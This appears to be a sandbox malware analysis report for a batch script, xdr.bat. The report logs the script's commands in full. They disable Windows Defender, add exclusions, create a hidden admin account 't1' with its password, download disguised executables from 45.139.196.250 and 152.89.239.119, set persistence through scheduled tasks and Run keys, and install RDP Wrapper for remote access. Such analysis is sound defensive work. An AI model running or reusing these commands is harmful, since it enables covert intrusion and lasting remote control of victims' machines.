MeshAgent.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry MeshAgent.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry MeshAgent.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry MeshAgent.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry MeshAgent.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 2 IoCs
pid Process 4032 PING.EXE 1100 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3668 schtasks.exe 3292 schtasks.exe 5332 schtasks.exe 5508 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5332 powershell.exe 5332 powershell.exe 1900 powershell.exe 1900 powershell.exe 3464 powershell.exe 3464 powershell.exe 3416 powershell.exe 3416 powershell.exe 1552 powershell.exe 1552 powershell.exe 5716 powershell.exe 5716 powershell.exe 5768 powershell.exe 5768 powershell.exe 3268 powershell.exe 3268 powershell.exe 1444 powershell.exe 1444 powershell.exe 6024 powershell.exe 6024 powershell.exe 4520 powershell.exe 4520 powershell.exe 2916 powershell.exe 2916 powershell.exe 4916 powershell.exe 4916 powershell.exe 2764 svchost.exe 2764 svchost.exe 2764 svchost.exe 2764 svchost.exe 704 powershell.exe 704 powershell.exe 5720 powershell.exe 5720 powershell.exe 5520 powershell.exe 5520 powershell.exe 4188 powershell.exe 4188 powershell.exe 452 svchost.exe 452 svchost.exe 452 svchost.exe 452 svchost.exe 5364 svchost.exe 5364 svchost.exe 5364 svchost.exe 5364 svchost.exe 5152 svchost.exe 5152 svchost.exe 5152 svchost.exe 5152 svchost.exe 6004 powershell.exe 6004 powershell.exe 3148 svchost.exe 3148 svchost.exe 3148 svchost.exe 3148 svchost.exe 4904 svchost.exe 4904 svchost.exe 4904 svchost.exe 4904 svchost.exe 5780 svchost.exe 5780 svchost.exe 5780 svchost.exe 5780 svchost.exe -
Suspicious behavior: LoadsDriver 11 IoCs
pid Process 668 Process not Found 668 Process not Found 668 Process not Found 668 Process not Found 668 Process not Found 668 Process not Found 668 Process not Found 668 Process not Found 668 Process not Found 668 Process not Found 668 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 5332 powershell.exe Token: SeDebugPrivilege 1900 powershell.exe Token: SeDebugPrivilege 3464 powershell.exe Token: SeDebugPrivilege 3416 powershell.exe Token: SeDebugPrivilege 1552 powershell.exe Token: SeAssignPrimaryTokenPrivilege 5988 wmic.exe Token: SeIncreaseQuotaPrivilege 5988 wmic.exe Token: SeSecurityPrivilege 5988 wmic.exe Token: SeTakeOwnershipPrivilege 5988 wmic.exe Token: SeLoadDriverPrivilege 5988 wmic.exe Token: SeSystemtimePrivilege 5988 wmic.exe Token: SeBackupPrivilege 5988 wmic.exe Token: SeRestorePrivilege 5988 wmic.exe Token: SeShutdownPrivilege 5988 wmic.exe Token: SeSystemEnvironmentPrivilege 5988 wmic.exe Token: SeUndockPrivilege 5988 wmic.exe Token: SeManageVolumePrivilege 5988 wmic.exe Token: SeAssignPrimaryTokenPrivilege 5988 wmic.exe Token: SeIncreaseQuotaPrivilege 5988 wmic.exe Token: SeSecurityPrivilege 5988 wmic.exe Token: SeTakeOwnershipPrivilege 5988 wmic.exe Token: SeLoadDriverPrivilege 5988 wmic.exe Token: SeSystemtimePrivilege 5988 wmic.exe Token: SeBackupPrivilege 5988 wmic.exe Token: SeRestorePrivilege 5988 wmic.exe Token: SeShutdownPrivilege 5988 wmic.exe Token: SeSystemEnvironmentPrivilege 5988 wmic.exe Token: SeUndockPrivilege 5988 wmic.exe Token: SeManageVolumePrivilege 5988 wmic.exe Token: SeAssignPrimaryTokenPrivilege 5272 wmic.exe Token: SeIncreaseQuotaPrivilege 5272 wmic.exe Token: SeSecurityPrivilege 5272 wmic.exe Token: SeTakeOwnershipPrivilege 5272 wmic.exe Token: SeLoadDriverPrivilege 5272 wmic.exe Token: SeSystemtimePrivilege 5272 wmic.exe Token: SeBackupPrivilege 5272 wmic.exe Token: SeRestorePrivilege 5272 wmic.exe Token: SeShutdownPrivilege 5272 wmic.exe Token: SeSystemEnvironmentPrivilege 5272 wmic.exe Token: SeUndockPrivilege 5272 wmic.exe Token: SeManageVolumePrivilege 5272 wmic.exe Token: SeAssignPrimaryTokenPrivilege 5272 wmic.exe Token: SeIncreaseQuotaPrivilege 5272 wmic.exe Token: SeSecurityPrivilege 5272 wmic.exe Token: SeTakeOwnershipPrivilege 5272 wmic.exe Token: SeLoadDriverPrivilege 5272 wmic.exe Token: SeSystemtimePrivilege 5272 wmic.exe Token: SeBackupPrivilege 5272 wmic.exe Token: SeRestorePrivilege 5272 wmic.exe Token: SeShutdownPrivilege 5272 wmic.exe Token: SeSystemEnvironmentPrivilege 5272 wmic.exe Token: SeUndockPrivilege 5272 wmic.exe Token: SeManageVolumePrivilege 5272 wmic.exe Token: SeDebugPrivilege 5716 powershell.exe Token: SeAssignPrimaryTokenPrivilege 1836 wmic.exe Token: SeIncreaseQuotaPrivilege 1836 wmic.exe Token: SeSecurityPrivilege 1836 wmic.exe Token: SeTakeOwnershipPrivilege 1836 wmic.exe Token: SeLoadDriverPrivilege 1836 wmic.exe Token: SeSystemtimePrivilege 1836 wmic.exe Token: SeBackupPrivilege 1836 wmic.exe Token: SeRestorePrivilege 1836 wmic.exe Token: SeShutdownPrivilege 1836 wmic.exe Token: SeSystemEnvironmentPrivilege 1836 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2908 wrote to memory of 5332 2908 cmd.exe 78 PID 2908 wrote to memory of 5332 2908 cmd.exe 78 PID 2908 wrote to memory of 6100 2908 cmd.exe 79 PID 2908 wrote to memory of 6100 2908 cmd.exe 79 PID 6100 wrote to memory of 4588 6100 cmd.exe 80 PID 6100 wrote to memory of 4588 6100 cmd.exe 80 PID 2908 wrote to memory of 6124 2908 cmd.exe 81 PID 2908 wrote to memory of 6124 2908 cmd.exe 81 PID 2908 wrote to memory of 6124 2908 cmd.exe 81 PID 2908 wrote to memory of 1900 2908 cmd.exe 84 PID 2908 wrote to memory of 1900 2908 cmd.exe 84 PID 2908 wrote to memory of 3464 2908 cmd.exe 85 PID 2908 wrote to memory of 3464 2908 cmd.exe 85 PID 2908 wrote to memory of 3416 2908 cmd.exe 86 PID 2908 wrote to memory of 3416 2908 cmd.exe 86 PID 2908 wrote to memory of 1552 2908 cmd.exe 87 PID 2908 wrote to memory of 1552 2908 cmd.exe 87 PID 2908 wrote to memory of 5432 2908 cmd.exe 88 PID 2908 wrote to memory of 5432 2908 cmd.exe 88 PID 5432 wrote to memory of 3136 5432 net.exe 89 PID 5432 wrote to memory of 3136 5432 net.exe 89 PID 2908 wrote to memory of 5264 2908 cmd.exe 90 PID 2908 wrote to memory of 5264 2908 cmd.exe 90 PID 5264 wrote to memory of 4492 5264 net.exe 91 PID 5264 wrote to memory of 4492 5264 net.exe 91 PID 2908 wrote to memory of 4912 2908 cmd.exe 92 PID 2908 wrote to memory of 4912 2908 cmd.exe 92 PID 4912 wrote to memory of 2640 4912 net.exe 93 PID 4912 wrote to memory of 2640 4912 net.exe 93 PID 2908 wrote to memory of 2376 2908 cmd.exe 94 PID 2908 wrote to memory of 2376 2908 cmd.exe 94 PID 2908 wrote to memory of 1740 2908 cmd.exe 95 PID 2908 wrote to memory of 1740 2908 cmd.exe 95 PID 1740 wrote to memory of 2244 1740 net.exe 96 PID 1740 wrote to memory of 2244 1740 net.exe 96 PID 2908 wrote to memory of 2912 2908 cmd.exe 97 PID 2908 wrote to memory of 2912 2908 cmd.exe 97 PID 2912 wrote to memory of 4548 2912 net.exe 98 PID 2912 wrote to memory of 4548 2912 net.exe 98 PID 2908 wrote to memory of 4392 2908 cmd.exe 99 PID 2908 wrote to memory of 4392 2908 cmd.exe 99 PID 4540 wrote to memory of 5988 4540 MeshAgent.exe 100 PID 4540 wrote to memory of 5988 4540 MeshAgent.exe 100 PID 4540 wrote to memory of 5988 4540 MeshAgent.exe 100 PID 2908 wrote to memory of 4648 2908 cmd.exe 102 PID 2908 wrote to memory of 4648 2908 cmd.exe 102 PID 2908 wrote to memory of 4624 2908 cmd.exe 103 PID 2908 wrote to memory of 4624 2908 cmd.exe 103 PID 2908 wrote to memory of 4656 2908 cmd.exe 104 PID 2908 wrote to memory of 4656 2908 cmd.exe 104 PID 2908 wrote to memory of 1384 2908 cmd.exe 105 PID 2908 wrote to memory of 1384 2908 cmd.exe 105 PID 2908 wrote to memory of 5536 2908 cmd.exe 106 PID 2908 wrote to memory of 5536 2908 cmd.exe 106 PID 2908 wrote to memory of 4464 2908 cmd.exe 107 PID 2908 wrote to memory of 4464 2908 cmd.exe 107 PID 2908 wrote to memory of 1588 2908 cmd.exe 108 PID 2908 wrote to memory of 1588 2908 cmd.exe 108 PID 2908 wrote to memory of 5560 2908 cmd.exe 109 PID 2908 wrote to memory of 5560 2908 cmd.exe 109 PID 2908 wrote to memory of 1256 2908 cmd.exe 110 PID 2908 wrote to memory of 1256 2908 cmd.exe 110 PID 4540 wrote to memory of 5272 4540 MeshAgent.exe 111 PID 4540 wrote to memory of 5272 4540 MeshAgent.exe 111 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 4 IoCs
pid Process 3028 attrib.exe 2864 attrib.exe 2588 attrib.exe 5612 attrib.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\xdr.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2908 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -windowstyle hidden Add-MpPreference -ExclusionPath 'C:'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5332
-
-
C:\Windows\system32\cmd.execmd /C net use \\45.139.196.250\shear /user:WORKGROUP\smb "123123@@"2⤵
- Suspicious use of WriteProcessMemory
PID:6100 -
C:\Windows\system32\net.exenet use \\45.139.196.250\shear /user:WORKGROUP\smb "123123@@"3⤵PID:4588
-
-
-
\??\UNC\45.139.196.250\shear\s.exe\\45.139.196.250\shear\s.exe -fullinstall2⤵
- Sets service image path in registry
- Drops file in Program Files directory
PID:6124
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell Add-MpPreference -ExclusionPath 'c:\'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1900
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3464
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3416
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell Add-MpPreference -ExclusionPath 'C:\programdata\Windata'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1552
-
-
C:\Windows\system32\net.exenet user t1 Raed12346@@ /add2⤵
- Suspicious use of WriteProcessMemory
PID:5432 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user t1 Raed12346@@ /add3⤵PID:3136
-
-
-
C:\Windows\system32\net.exenet localgroup administrators t1 /add2⤵
- Suspicious use of WriteProcessMemory
PID:5264 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators t1 /add3⤵PID:4492
-
-
-
C:\Windows\system32\net.exenet localgroup Administratörer t1 /add2⤵
- Suspicious use of WriteProcessMemory
PID:4912 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administratörer t1 /add3⤵PID:2640
-
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v t1 /t REG_DWORD /d 0 /f2⤵
- Hide Artifacts: Hidden Users
PID:2376
-
-
C:\Windows\system32\net.exenet user t1 /active:no2⤵
- Suspicious use of WriteProcessMemory
PID:1740 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user t1 /active:no3⤵PID:2244
-
-
-
C:\Windows\system32\net.exenet user t1 /active:yes2⤵
- Suspicious use of WriteProcessMemory
PID:2912 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user t1 /active:yes3⤵PID:4548
-
-
-
C:\Windows\system32\ReAgentc.exereagentc.exe /disable2⤵
- Drops file in Windows directory
PID:4392
-
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /f2⤵PID:4648
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\PushNotifications" /v ToastEnabled /t REG_DWORD /d 0 /f2⤵PID:4624
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\PushNotifications" /v LockScreenToastEnabled /t REG_DWORD /d 0 /f2⤵PID:4656
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\MSEdge" /v Enabled /t REG_DWORD /d 0 /f2⤵PID:1384
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.Defender.SecurityCenter" /v Enabled /t REG_DWORD /d 0 /f2⤵PID:5536
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v DisableNotificationCenter /t REG_DWORD /d 1 /f2⤵PID:4464
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1588
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "1" /f2⤵PID:5560
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f2⤵PID:1256
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v TamperProtection /t REG_DWORD /d "1" /f2⤵PID:4732
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵PID:6020
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/ngrok.yml','C:\Users\Admin\AppData\Local\ngrok\ngrok.yml')2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5716
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/ngrok.zip','C:\ProgramData\Windata\ngrok.zip')2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5768
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://152.89.239.119/x222.jpg','C:\ProgramData\Windata\winlogin.exe')2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3268
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/WindowsUpdate.jpg','C:\ProgramData\Windata\WindowsUpdate.exe')2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1444
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell Expand-Archive "ngrok.zip" -DestinationPath "."2⤵
- Suspicious behavior: EnumeratesProcesses
PID:6024
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/auto-install-hrdp.bat','C:\ProgramData\Windata\installer.bat')2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4520
-
-
C:\Windows\system32\attrib.exeattrib +s +h C:\programdata\Windata2⤵
- Sets file to hidden
- Views/modifies file attributes
PID:3028
-
-
C:\Windows\system32\attrib.exeattrib +s +h C:\programdata\Windata\*.*2⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2864
-
-
C:\Windows\system32\attrib.exeattrib -s +h C:\programdata\Windata\*.bat2⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2588
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn WindowsPowerup /ru "Admin" /sc ONSTART /DELAY 0000:30 /RL HIGHEST /tr "C:\ProgramData\Windata\srlhost.exe" /f /it2⤵
- Scheduled Task/Job: Scheduled Task
PID:3292
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn Winlogo /ru "Admin" /sc minute /mo 5 /RL HIGHEST /tr "C:\ProgramData\Windata\winlogin.exe" /f /it2⤵
- Scheduled Task/Job: Scheduled Task
PID:5332
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn WindowsUp /ru "Admin" /sc ONSTART /DELAY 0000:30 /RL HIGHEST /tr "C:\ProgramData\Windata\WindowsUpdate.exe" /f /it2⤵
- Scheduled Task/Job: Scheduled Task
PID:5508
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "WindowsPowerup" /t REG_SZ /F /D "C:\ProgramData\Windata\srlhost.exe"2⤵
- Adds Run key to start application
PID:5892
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "WindowsUpdatez" /t REG_SZ /F /D "C:\ProgramData\Windata\WindowsUpdate.exe"2⤵
- Adds Run key to start application
PID:4972
-
-
C:\Windows\system32\attrib.exeattrib -s +h C:\programdata\Windata\*.bat2⤵
- Sets file to hidden
- Views/modifies file attributes
PID:5612
-
-
C:\Windows\system32\cmd.execmd /C C:\ProgramData\Windata\installer.bat2⤵
- Drops file in Program Files directory
PID:2828 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/hrdp/hrdp.zip','C:\ProgramData\Windata\hrdp.zip')3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2916
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell Expand-Archive "C:\ProgramData\Windata\hrdp.zip" -DestinationPath "C:\ProgramData\Windata\hrdp"3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4916
-
-
C:\Windows\system32\cmd.execmd /C C:\ProgramData\Windata\hrdp\install.bat3⤵PID:2232
-
C:\ProgramData\Windata\hrdp\RDPWInst.exe"C:\ProgramData\Windata\hrdp\RDPWInst" -i -o4⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- Modifies WinLogon
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:1868 -
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:560
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/hrdp/update.zip','C:\Program Files\RDP Wrapper\update.zip')3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:704
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/hrdp/autoupdate.zip','C:\Program Files\RDP Wrapper\autoupdate.zip')3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:5720
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell Expand-Archive "update.zip" -DestinationPath "."3⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:5520
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell Expand-Archive "autoupdate.zip" -DestinationPath "."3⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:4188
-
-
C:\Windows\system32\cmd.execmd /C "C:\Program Files\RDP Wrapper\rdpwrap_ini_updater.bat"3⤵
- Drops file in Program Files directory
PID:1072 -
C:\Windows\system32\fsutil.exefsutil dirty query C:4⤵PID:5868
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.17134.706]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"4⤵PID:2928
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.17763.165]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"4⤵PID:2976
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.17763.292]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"4⤵PID:3012
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.17763.379]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"4⤵PID:2924
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.17763.437]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"4⤵PID:1796
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.18362.1]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"4⤵PID:4272
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.18362.53]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"4⤵PID:5252
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.18362.267]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"4⤵PID:4908
-
-
C:\Program Files\RDP Wrapper\RDPWInst.exe"C:\Program Files\RDP Wrapper\RDPWInst.exe" -r4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4280
-
-
-
C:\Windows\system32\cmd.execmd /C "C:\Program Files\RDP Wrapper\re-install.bat"3⤵
- Drops file in Program Files directory
PID:5472 -
C:\Windows\system32\fsutil.exefsutil dirty query C:4⤵PID:1224
-
-
C:\Program Files\RDP Wrapper\RDPWInst.exe"C:\Program Files\RDP Wrapper\RDPWInst" -u4⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5036 -
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall delete rule name="Remote Desktop"5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2100
-
-
-
C:\Program Files\RDP Wrapper\RDPWInst.exe"C:\Program Files\RDP Wrapper\RDPWInst" -i -o4⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- Modifies WinLogon
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:2968 -
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3292
-
-
-
C:\Windows\system32\fsutil.exefsutil dirty query C:4⤵PID:5852
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.17134.706]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"4⤵PID:5824
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.17763.165]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"4⤵PID:3440
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.17763.292]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"4⤵PID:4720
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.17763.379]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"4⤵PID:5892
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.17763.437]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"4⤵PID:4892
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.18362.1]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"4⤵PID:132
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.18362.53]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"4⤵PID:1412
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.18362.267]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"4⤵PID:1320
-
-
C:\Program Files\RDP Wrapper\RDPWInst.exe"C:\Program Files\RDP Wrapper\RDPWInst.exe" -r4⤵
- Executes dropped EXE
PID:6000
-
-
-
C:\Windows\system32\cmd.execmd /C "C:\Program Files\RDP Wrapper\helper\autoupdate__enable_autorun_on_startup.bat"3⤵PID:5488
-
C:\Windows\system32\fsutil.exefsutil dirty query C:4⤵PID:4528
-
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc ONSTART /tn "RDP Wrapper Autoupdate" /tr "cmd.exe /C \"C:\Program Files\RDP Wrapper\autoupdate.bat\" -log" /ru SYSTEM /delay 0000:104⤵
- Scheduled Task/Job: Scheduled Task
PID:3668
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "$settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries; Set-ScheduledTask -TaskName 'RDP Wrapper Autoupdate' -Settings $settings"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:6004
-
-
-
C:\Windows\system32\cmd.execmd /C "C:\Program Files\RDP Wrapper\autoupdate.bat"3⤵
- Drops file in Program Files directory
PID:2980 -
C:\Windows\system32\fsutil.exefsutil dirty query C:4⤵PID:3928
-
-
C:\Windows\system32\sc.exesc queryex "TermService"4⤵
- Launches sc.exe
PID:1684
-
-
C:\Windows\system32\find.exefind "STATE"4⤵PID:2768
-
-
C:\Windows\system32\find.exefind /v "RUNNING"4⤵PID:1388
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c query session rdp-tcp4⤵PID:3464
-
C:\Windows\system32\query.exequery session rdp-tcp5⤵PID:680
-
C:\Windows\system32\qwinsta.exe"C:\Windows\system32\qwinsta.exe" rdp-tcp6⤵PID:5056
-
-
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /f /v ServiceDll /t REG_EXPAND_SZ /d "C:\Program Files\RDP Wrapper\rdpwrap.dll"4⤵
- Server Software Component: Terminal Services DLL
PID:5740
-
-
C:\Program Files\RDP Wrapper\RDPWInst.exe"C:\Program Files\RDP Wrapper\RDPWInst.exe" -u4⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5692 -
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall delete rule name="Remote Desktop"5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5272
-
-
-
C:\Program Files\RDP Wrapper\RDPWInst.exe"C:\Program Files\RDP Wrapper\RDPWInst.exe" -i -o4⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- Modifies WinLogon
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:776 -
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5720
-
-
-
C:\Windows\system32\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f4⤵PID:3172
-
-
C:\Windows\system32\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f4⤵PID:4056
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /f "rdpwrap.dll"4⤵PID:1292
-
-
